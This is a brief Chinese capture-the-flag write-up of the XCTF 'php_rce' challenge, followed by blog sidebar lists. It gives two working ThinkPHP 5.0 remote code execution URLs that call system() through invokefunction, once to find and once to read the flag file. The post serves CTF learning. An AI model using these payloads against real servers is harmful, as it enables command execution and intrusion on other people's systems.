2020.3.27 （php_rce）③

其他 2020-04-10 21:33:18 阅读次数: 0

本题使用的框架是ThinkPHP 5.0 的框架。此版本存在getshell漏洞（百度一下poc一抓一大把）
查找flag：

http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

在这里插入图片描述
得到flag的payload：

http://111.198.29.45:45747/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

在这里插入图片描述

狗13

发布了48 篇原创文章 · 获赞 3 · 访问量 3369

私信关注

猜你喜欢

转载自blog.csdn.net/DSR446/article/details/105153195

2020.3.27 （php_rce）③

2020.3.27

攻防世界 | php_rce

php_rce 攻防世界xctf web

[wp] 攻防世界 php_rce

XCTF中高阶web的php_rce

ThinkPHP 5.0 版本存在getshell漏洞 php_rce

XCTF-高手进阶区：php_rce

力扣---2020.3.27

2020.3.27 xctf（baby_web）①

【攻防世界 XCTF】 WEB 高手进阶 php_rce ——最全面、最直观的WP

2020.3.27 xctf（Training-WWW-Robots）②

阿里春招笔试2020.3.27(贪心/差分/概率)

4.php_rce

php中无参函数的RCE

攻防世界web---php_rce

Phar与Stream Wrapper造成PHP RCE的深入挖掘

利用文件操作函数结合PHP伪协议RCE

渗透测试-php-RCE+Struts2拿webshell

PHP：jQuery-File-Upload任意上传/RCE/越权删除文件漏洞分析

攻防世界-web-高手进阶区003-php_rce

解决 ThinkPHP5 RCE 在PHP7下，不能使用包含的问题

p84 CTF夺旗-PHP弱类型&异或取反&序列化&RCE

pikachu——RCE

rce攻击

RCE漏洞

Weblogic RCE + confluence RCE + cacti RCE正反向代理靶场

某钉RCE & 某葵RCE 复现

Earcms Distribution program RCE

Thinkphp 缓存RCE

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

周排行

Python环境安装与基础语法（1）——计算机基础知识

IMU预积分

ADAS中的LDW、FCW、BSD、LCA、ACC、AEB、APA、DMS代表的含义

B站笔试两道题

skyeye arm 硬件虚拟机环境的搭建

Web前端静态页面示例

数组-合并排序数组 II-简单

springcloud之版本问题启动报错

面向对象-------------匿名对象(六)

输入URL到页面呈现中间发生了什么？

每日归档

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)